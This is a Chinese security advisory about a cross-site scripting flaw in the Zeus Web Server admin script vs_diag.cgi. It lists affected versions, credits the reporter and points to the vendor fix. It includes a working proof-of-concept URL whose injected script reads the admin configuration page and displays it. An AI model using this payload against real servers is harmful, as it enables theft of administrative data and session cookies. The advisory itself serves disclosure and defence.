安全研究

安全漏洞
Zeus Web Server Admin接口vs_diag.cgi跨站脚本执行漏洞

发布日期:2003-05-17
更新日期:2003-06-04

受影响系统:
Zeus Technologies Zeus Web Server 4.2 r2
Zeus Technologies Zeus Web Server 4.2
Zeus Technologies Zeus Web Server 4.1 r5
Zeus Technologies Zeus Web Server 4.1 r4
Zeus Technologies Zeus Web Server 4.1 r3
Zeus Technologies Zeus Web Server 4.1 r2
Zeus Technologies Zeus Web Server 4.1 r1
Zeus Technologies Zeus Web Server 4.1
Zeus Technologies Zeus Web Server 4.0
描述:
BUGTRAQ  ID: 7751

ZEUS是一款开放源代码的WEB服务程序,包含基于WEB的管理接口。

ZEUS WEB管理接口中vs_diag.cgi脚本对用户提交的参数确实正确的过滤,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户点击,导致恶意脚本在用户浏览器上执行。

问题是vs_diag.cgi脚本对server参数值缺少检查,攻击者可以提交任意值给此参数,包含恶意脚本代码。利用这个漏洞可以获得其他用户基于认证的Cookie敏感数据。

<*来源:Hugo "Vázquez" "Caramés" (overclocking_a_la_abuela@hotmail.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105427199423918&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Hugo "Vázquez" "Caramés" (overclocking_a_la_abuela@hotmail.com)提供了如下测试方法:

http://<target>:9090/apps/web/vs_diag.cgi?server=&lt;script&gt;function%20pedo()
{var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseText;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
20this%20info!%20Much%20more%20evil%20actions%20are%20possible...")
&lt;/script&gt;

建议:
厂商补丁:

Zeus Technologies
-----------------
Zeus 4.2r3不存在此漏洞,可从如下地址下载获得:

http://www.zeus.co.uk/

浏览次数:6711
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障